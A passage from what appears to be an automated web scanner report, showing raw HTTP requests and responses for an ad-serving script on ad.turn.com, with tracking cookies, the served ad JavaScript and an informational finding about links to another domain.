GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=Ip0ebvHq9-6cmCR2bXP5_fNx2AR3sIhp4p39Iz_V0Qg2ZWiQd3tT9BFQw06IP9QqBnjrxaFOX3A2Mp5hsqmn769niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloDYQQhNu9aqv6NqLy9PboSDUcW3gy4ahk2mxvXjqV_8HMdltWoLJ0ZRSlLXDIZEn8XYkMwDMhThyDTSkJz17--sccgy0lyoFcbjisrOYNESdVweqa0CK0OT2RuObPoCPAYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7lBPY5bJrxpuGqREB7_HXzaHnXpMPSYaXk1bDrduuz7117nSKtRoDtj2nylqWO-cGwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gTaS1w5xhX3951duqXeD-FccmVnaGRMAMpWrCzFs9XNyZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAZwAJT0AK5X5HHeFjM7WcAPevK6xDUElKMQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676602&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658602580&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658602586&frm=1&adk=2614322350&ga_vid=1898243012.1303658603&ga_sid=1303658603&ga_hid=226900712&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBnY-SbN8VG76c4pTy1x4tO_Sj_92V_c3sy_af5K1wDa53eNzFiV73vp6h1m4YoN9gfv5UHXFQ2EokABglYvcvHxrKLhk0Oa_Km3kT-DB1pnpY41igpyJxMNQF2iyMUjVL7ttzR-BfUlxiurrQNK1NDp-4mMBHEuc5cySrnTOh9dMxUw7WE-jbWH4kVY90906vEqljUXjN51Jt0mGvCxzEQwCiVbU9JMq477_djhhS3SPkBUOiwXvNZ5qXshwvYwx79p4ngj3vtri-pvt5MhqWaQjjpMBxrbO3BokNWkTLwjj2gCtgf5Qhl2YOxdQQWgOxtDIlnQE-ofvOlTreFo8nIhLOXDY0psUlTnGLNnnydFejHnHxno5JcWuh9OwP5WPMPXscRpCIMXQlyEV2-I3IIzy91bwO_d9EJo3mm3QAFgWCzMlsJM2789Ns8YMIodbd9oSQ80dokkKUxJ75kJBDo9prd088xC1yzr7JSNK1C6Wfrc4PoBe7PQexZTwznXHLToARBEFWiadK-MzpgjJo-jTvrGslxQxMOSg_OH8TApjcKQRDrCNo_fKO0O6rQrNBeK1ac1kY-R5cTHDVI8fjybjRvjybj510L1lHuYF9vOfs3PRLc9kbvpzilPLXHi079KP_3ZX9zZRVXQGO8fW7t8V-mYdCaHNEq30AVPVAGoRKur0pKj4xDrZjSDW0d6Ge5h2FkoPIancXXoaEoJE3Hc2DB_YXf8kw1AXaLIxSNUvu23NH4F9S_CGxtVF2UhIqHPNqrCcBYzlzJKudM6H10zFTDtYT6Nv-v4sX3PfZzMJc61lkh2-hBzDtWEUaNjGqsIqgzYdZZrjvv92OGFLdI-QFQ6LBe85R3vMoYhkXhWy5J91UXk-OuL6m-3kyGpZpCOOkwHGtsCD6mq_S30vkfPB6K8A_ZRfdaBCNZWyJXoWnm04UEXix-86VOt4WjyciEs5cNjSmxxPvN6RLPLO1p4lQ5lrgMzFxa6H07A_lY8w9exxGkIgxt0vsiobF6ODkmglJ7mWGMPTKgqOHGcDR_Emj6qnilT1JI7eQCKlb1D2RYtn4wmX8JnT_77eO3YOrJ4Sg6Z4khadK-MzpgjJo-jTvrGslxQ6fi7HczpIMBvCBfMsrwX6pv9BiYngppqZAgOJPk3JR39idVXIu3f3Btwc7IzjVzjy2rMvBfZvNr-p9IKhzMtG_vpzilPLXHi079KP_3ZX9zXb6Tz5WewXZbgAbPJA1Kjx1hJ3Lx2jTH6Z2vbSJvJVgmvJ__nR9G2kz2nFBjBqYhxmY5WhWxlfSu5D7TjXyp5Ew1AXaLIxSNUvu23NH4F9SRsHGj-wraaDOVo-NnY8Z4bGjtD6F1vlAvbNz2LW0-XKY7_lT1bl78jcEnJ5WkDxaCFrKFt2PqJqf5DVukUoXlIHbOBASPSx_aSP-y9lN0xDYq3g0SjnCHIdwFIgaPN2GjM2E94Xjq_zRsOz19_sukeQe8KkXlnoIS6MkKzv5MhJ-zCwLajI_fAi7yzInpUPfqRl9A2iCBQ4QmbLn8QybuN97-yRVKiOkq451CVtrK-L_B9P-PLsJaA2q91YwrJSsVjkSgci3DslhbhLAHtk-5yNmlzVaY-ux4ldMmn95-Mr2ngwrG9CjJIipUiIWpKw0p87U_E8RCtd37Q5K62pPbYE3fjGnapFf2sSY7pRQig4QkcT5omhxvFxaDBZv8HsDc7oWxx3lMWh66OLM4EbN-7gsqGSEylLNa_SWJb-nVLwCV0QM7hreP48O_HKFKVj-fDyYACmr51dWIG_2mo97mPu8Iaf_kTsqgk7ugXpuyF50sVuvaLjQZQB-z3BRWjAOi3ckepqtCIQvo_oG8eMg83LsUjEPrRcsES3aoJiQUJTHUYLYRhoyzRad2pnwkOXjJjGluiggZfpQC0_zBkEv-v_j1kf0lu_F76LshZ13njOq9AcoC0Ui5m2rwOSIdaFvHPrlj9faHB4xTE0H4ycU-Far0EQ9jI2dgmB77e0oaHmNisOYCeGi33B_vta6JSr3j6o1UpD0LBlPnfb4q3Dmtj6bGXbZIhpmPDYJ3mAwabzJVvtmA9XADUGeSzCUmHsqeVvKRG6bTklSz_s9jHGHsU5_u3GxZteiyVHpNKhDzL7vQ0mJRuzfPJxh9dK_7uFehBzO10MqyMuK8xC49hxun-96l9nCAyeIF8XErkhGdpskxfTLV8EIwWVQ2uHZJLUSdGm0TeMLOBK0QhS-o5a2xyahlNh3iZjtdsIooTjsgAVMIgXUnyIDF5CqCarUh49S01Mh8PTu4y-hqompR6VWaJIG7SFeGTv62fgtjg1I8JQTrvXTA5V0FO00TmOhQnOjFd2gRw98MdY27_C75SQT3F4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA7HAeaX_6Zr-t3T_LQ2J_VLuAlmfHhZv8RdvHYfz6uVtWY4Zb1B-5Vx0eIvlVDYxBk; fc=FYu9a2gKbdfaoEP6zzAEbTULe5uzocfVf8GeQRlhtGzifjwXXf-M0jf6P6DTaEkggmUcePzA9deCmnu56kGfo3G9nFGYIVw5iLaHzkGYEwm4HlP0fRkaM5HlzXZ0g2VP9BoIXaOAeDVXRsLRbsFkfKtr4MnGGfFMDcCsCfLKkyPojEuHv26X9eomoEX8ElP2; pf=_1vlf3coaTRSlfnRn2BWvmKCqkXYWBqc-E6-ZlkCbgGS04H7stKnZdMqlx3yK2bUZZ6eDl_tJYtkuIVW7eskVZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:21 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=pD_gFAhHZ016tfVkgeG_5InTY8C3-ZePiVSXWMxnqornC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdetVRZLlX36YeiIgwaZY3FpkTJNpTu-tDf4fZLT0FlEqBmvO8Uk9CM6-0joRPbiXR789Ns8YMIodbd9oSQ80dok0rtGkt3b9TtUGpDbpuZJlmnSvjM6YIyaPo076xrJcUMpqvFKCK8YLFH8kku1qHnYE27uj29BfS5yq62USuCcbKSFM-Ia8iW6v4r--R4cQ0uOOC40LIDFF7ghihjQchWX76c4pTy1x4tO_Sj_92V_c3HIM3kTYgp41FGyov4eYc8ZPRlERVaGhUKD4I6xui-k39uQ1iPta8Wrn8c58UAYunU8Ljo1kIO66NNEOBdZGY9MNQF2iyMUjVL7ttzR-BfULWNnrTnHRhAo67h8kocDDs5cySrnTOh9dMxUw7WE-jb8CUGnr_9YMcr_n1EZErhbhuSGd1cU85KfnuzOH-gIz6477_djhhS3SPkBUOiwXvOKnJ5sQzaxqcr382lih416ri-pvt5MhqWaQjjpMBxrbKLi4kFOxMgDpMIvSE-_pNYetk_lkojZdYL09zwtbcpAD7k9QAhA1y9lElb1FxLMTTPDxEi4YsbnV5_AHEyzNvdcWuh9OwP5WPMPXscRpCIMeN1yIaQsj3afG85u2NuDpKflvfwPRcaattTbDebgh5WpDjfslrVyDxMBDlIppEJHdMCxgYn7ExS9rQpLrKZ_Z2nSvjM6YIyaPo076xrJcUMU9pmWoVnBlixHIFlMY3cEkbHzgou97WNb10sLlTme_qfpCL8Eb_AKATM_EJjD9j3iWH9n73vwyS9Iba3Tt9WP76c4pTy1x4tO_Sj_92V_c4P3019yAVgx2_ti72FX3YgMihkX8zucrcdwEbmMe-hv110qkc59lFVJvNpGPUP2wEhW-jakFElzPbLN9KKI4SFMNQF2iyMUjVL7ttzR-BfUx7ZN8WfPOVDlHmKorgnVms5cySrnTOh9dMxUw7WE-jZExyTg0inQXJYzK1oc-65MhhDaCIbRtKqhwxjYbgy7RK477_djhhS3SPkBUOiwXvO8O702X1aYINK4PjXrl81Cri-pvt5MhqWaQjjpMBxrbLRftAx0P2po2mcQN3xnAPWX0ln2ZevenUVZUvpz7ho9D7k9QAhA1y9lElb1FxLMTaQWNZQ9pVECOjwJqf0qS4xcWuh9OwP5WPMPXscRpCIMI17bQKB1MKSjJ4AnwSp4PEjbY-nuOofhw9IqjkaqEohueA6joXijA3s4lagZ_BmcnAhcETWG2r_CoUdLQLtjX1yzr7JSNK1C6Wfrc4PoBe49OjAakl7-2a3YUyQSEcAEadK-MzpgjJo-jTvrGslxQ-aD17WpUy-2kMCPACiI6olM2M4TlfE8-EAAJpHFMIjpLWcQpuP7-rZntDjqWT1AepfX9ysrspxpTakTdWuxDa7vpzilPLXHi079KP_3ZX9zDNdXMQTa13WNC7oLr6-hZ2xcqNpbx_qyOHF8bx__m3LjU2naVq8rzPkfHTZFJAYogPyKWOgXpB9GfxR8d3lqM0w1AXaLIxSNUvu23NH4F9TWnkDgrZHe8T6IOXfKC2_NzlzJKudM6H10zFTDtYT6NhcVjl29PoaOApRJaA6XuwrKBNFaS9_IA_SYgAy6Pzlvrjvv92OGFLdI-QFQ6LBe85Dge1nISCa8_412MA9jLBGuL6m-3kyGpZpCOOkwHGtsoSSTaS2xg6Bv8mW5gJR3yXzlPMql1xzrSAgN1mjs8uJD3XZ60zEd7PscVtFglBi6fn_74IR2tqQOzDhhuuvsvVxa6H07A_lY8w9exxGkIgye2885-8oYawk5NLy_kDdkRRsPWTYc5aSSl5tqKlpE6WckgCGSuiZNCnk1aHQCYkDPgK_vtMxk3J_RnF-KCsLBadK-MzpgjJo-jTvrGslxQxjpLwkY8CzsjWigFXd0ugp0Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4ejlrdfdTeNNQ23r3cVc08dLvpzilPLXHi079KP_3ZX9zLwF1To5J2I9_8J-ktyw5JHi1LtOvJl4H91g0BF7nljG-z8CfdXpYmY1u_oWwboSZ-62KbEowWxnVcnSXWo8CqG_AXolZ7HlYcn1IG2iuDzUm3-TBwK9N_v-cRmWlQKoAs_Y6ICgWasMM5DWElEE3mrRsLtIT2Ygve6thNkIDmTPFiLLg2uvk7lV34RLrT7sDN3vu4WG44zQxf55cnAq2dXP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIQqOlzr39jpVus2s2MGJt02CP-a9-Zc2aK4TggTg7yLFan1KYNZCuznhMO2BM5lPflcAqlDMUSFQwAhqSIWB4T1IuXmPpa4qmXbukrnlZ5AZhfXD4z8mc7oab7q2cflP4Cuw7Sh2zVZs8LUHvh0B4ORTdn2OCYqN2AXXm94C1IFpVYVR8tDeUmGP2D4iuMQCSFfw-YwuOpTTqo7xcxFgip05fDwrMzPs6JG3UjNsUWsBBcQRYk1N7DWc75XJ52KLHxtHGJu2SIaoECffegue6YBx-pMNnjN-kh10ARFgNxf4KgwePV0rhZSAPs0elkMlPPKuRfb5of4RS0KM-vIxCYbmNVwJcjqeJj-8RO-O8uLM5d41RtV-TYB6ZX2Z2f2sWULPjaj-TcixYWnJOckv2x1hkOcqMBa-FJ6vjArRdGUC4ZDF-xhv69qwmZh1BW_sjp_JMv-2OsH7kmJYuX1kJMjBWVrz7u7grGNhHqSIQM0YiFZs1e46yYs72x4V4G5g6skfznJxWLFANSsaDEinwcgAePJitWrkZg8MusjZ42hhaz4NsfZaH43yNAuV5jEfuNBW0UUD1FTrR8dWua3pbTOr3qmCPy6KMbaqZ1CZZZTdO4w56OOE1MWc0ME5geary4IWidZFBM4CXdWml_NgTpNtY7C9ADacWp13yFDNv5QfHWkJGzFLhJWbD2TzP799pVhd2hJTWEIYee2zL7kulFPLjRcdP-8HHM_yAcVuLd1iUr3CDcUNKfecgTUF0tcGU3N-qMYYUsx1t0HBVMuxDw2yb3IRskUU-dEa_gXk_R9CFAHBfb6-R9xgF7P_u8gabLFRUWEK-fROx3Y031mDwLJU1IVthPmLsRdRWx1fxVOkXpv_BNQrM-J_qzhSw9GPlerfb1VYq4tSTzJHZO-4mVs-dIKwEw_MUzZNPrbaVRvLeGtyG2uR1W_3gwxi8sWv9CqOFUDyegOYAwbeZGxYpwBYsSdyFlGM3KDJPLAebY4k60AZXH9DSc16U42vooYbtVxfvV4W5wlx75RUOO2HiQFm0Nl_lo0Vbm-d7snQaJ8ckL1DbpmZ33jmhZs2ZSpc_Ke_v4SMlvUaAfh97W6LUjGnlIIhFHICklznXqDkhBy-iycabDvZFbaJMzr-ki6_1LjeUvSL-YDv7U7RseZZTJ; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: fc=9_5ay7rffuoTiRWSKxNkRHoXEcukANXik7WwoUVZ9ojWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF_hBg4ZnscOU_y7Sc1CSCH9rInWq2zX4VXT-XKnjQ0qC3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: pf=B7ZBnPXRFmyqr3AjEaKP5FRj_CNMFT3q5p6wKb9ZALCS04H7stKnZdMqlx3yK2bU52sOOuiZ0GSbuZhAi5YdhZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:20 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=3693595831803653362?;click=http://r.turn.com/r/tpclick/id/8iyF6tZJQjP7Lw4AAgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=3693595831803653362?;click=http://r.turn.com/r/tpclick/id/8iyF6tZJQjP7Lw4AAgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
GiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=3693595831803653362?">\n<IMG SRC="http://ad.doubleclick.net/ad/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=3693595831803653362?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.39. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=ruaS1-KEPhDZ7POOG22JCq5GjVhJ41pOTS5J7yUrVx-v55j_xVvDhCceBPiaSwlbta9a9_cLEBLJEnhT8lFYR69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYWecHLMh0arXQueGLxCVl7LoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk8EevYjV2XrbhMMzMhcV-xwH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTuQAFUOIK7FUK3DgJ_EtiWCk4WVsrPRXoOA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtyhuuVO0TeKhFYqqsQf8k-DhDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCUMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyxTHP32A_KUUfHvWo7YraQhxKVRQ%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681548&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663548258&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663548263&frm=1&adk=2614322350&ga_vid=1845614909.1303663548&ga_sid=1303663548&ga_hid=843104430&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=ojI42e6Z4xWvMFdtBrBpzjkrrTWsLDfc7OA--dWxUuq76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5